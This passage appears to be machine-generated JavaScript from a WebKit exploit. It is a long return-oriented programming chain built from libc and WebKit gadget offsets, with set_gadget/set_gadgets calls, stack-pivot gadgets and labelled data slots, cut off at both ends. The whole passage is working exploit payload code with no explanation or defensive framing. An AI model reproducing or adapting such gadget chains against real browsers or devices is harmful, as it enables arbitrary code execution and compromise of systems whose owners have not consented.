set_gadget(libc_base+144605,); //pop rdi //L9044: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9045: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+427656, //L9047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+427672, //L9048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+427640, //L9046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9046: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9047: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9048: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+427816, //L9051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+427832, //L9052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+427784, //L9049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9049: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9050: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L9051: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9052: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+427904, //L9053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L9053: db([0, 0]); // 0x0 //L8994: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+428032, //L9056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+428048, //L9057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+428016, //L9055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9055: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9056: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9057: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+428160, //L9059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+428208, //L9062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+428176, //L9060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9060: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9061: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9062: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+428320, //L9063+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+428312, //L9063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9063: db([0, 0]); // 0x0 set_gadgets([ ropchain+428336, //L9063+24 ropchain+429688, //L9058 libc_base+764760, //pop rsi ropchain+428376, //L9064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, 
//mov rax, r8 libc_base+763368 //pop rcx ]); //L9064: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9066: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+428496, //L9069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+428480, //L9067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9067: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9069: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+428672, //L9072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+428688, //L9073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+428640, //L9070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+428656, //L9071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9070: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9071: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9072: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9073: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+428784, //L9075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+428768, //L9074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9075: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, 
//mov [rdi], rax libc_base+759608 //pop rax ]); //L9076: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9077: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L9078: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9079: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9080: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L9081: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+429136, //L9083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9083: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+429192, //L9084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9084: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+429280, //L9087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+764760 //pop rsi ]); //L9086: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L9087: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+429344, //L9089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9089: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+429400, //L9090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9090: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+429536, //L9094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+429520, //L9093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9092: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9094: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+429600, //L9095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9095: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9097: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+429680, //L9098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9098: db([0, 0]); // 0x0 //L9058: set_gadgets([ libc_base+764760, //pop rsi 
ropchain+429728, //L9100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9100: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9102: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+429848, //L9105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+429832, //L9103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9103: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9105: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+430024, //L9108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+430040, //L9109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+429992, //L9106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+430008, //L9107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9106: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9107: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9108: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9109: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+430136, //L9111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+430120, //L9110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9110: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9111: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 
0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9112: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9113: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L9114: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+430336, //L9116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9116: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+430392, //L9117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+430528, //L9121 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+430512, //L9120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9119: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9120: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9121: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+430664, //L9124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+430696, //L9126 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+430648, //L9123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9123: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9124: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9126: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+430808, //L9127+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+430800, //L9127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9127: db([0, 0]); // 0x0 set_gadgets([ ropchain+430824, //L9127+24 ropchain+431888, //L9122 libc_base+764760, //pop rsi ropchain+430864, //L9128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9128: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9130: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+430984, //L9133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+430968, //L9131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9131: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9133: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+431160, //L9136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+431176, //L9137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+431128, //L9134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+431144, //L9135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9134: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9135: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9136: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9137: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+431272, //L9139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+431256, //L9138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9138: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9139: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9140: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9141: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L9142: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+431480, //L9144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L9143: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L9144: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+431544, //L9146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9146: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+431600, //L9147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9147: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+431736, //L9151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+431720, //L9150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9149: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9150: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9151: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+431800, //L9152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9152: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9154: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+431880, //L9155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9155: db([0, 0]); // 0x0 //L9122: set_gadgets([ libc_base+764760, //pop rsi ropchain+431928, //L9157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9157: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9159: db([40, 
0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+432048, //L9162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+432032, //L9160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9162: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+432128, //L9163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+432144, //L9164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9163: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9164: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+432304, //L9168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+432272, //L9166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+432288, //L9167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9165: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9166: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9167: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9168: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+432360, //L9170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9170: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+432488, //L9172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+432504, //L9173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+432472, //L9171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9171: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9173: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+432664, //L9177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+432632, //L9175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+432648, //L9176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9174: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9175: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9176: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9177: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+432720, //L9179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9179: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+432848, //L9181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+432864, //L9182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+432832, //L9180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9180: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9182: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+433024, //L9186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+432992, //L9184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+433008, //L9185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9183: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9184: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9185: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9186: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+433080, //L9188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9188: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+433208, //L9190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+433224, //L9191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+433192, //L9189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9189: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9190: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9191: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+433304, //L9192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+433320, //L9193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9192: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9193: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+433416, //L9195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+433400, //L9194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9194: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9195: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+433496, //L9196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9196: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9197: db([105, 0]); // 0x69 set_gadget(libc_base+144605,); //pop rdi //L9198: db([105, 0]); // 0x69 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+433640, //L9199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+433672, //L9201 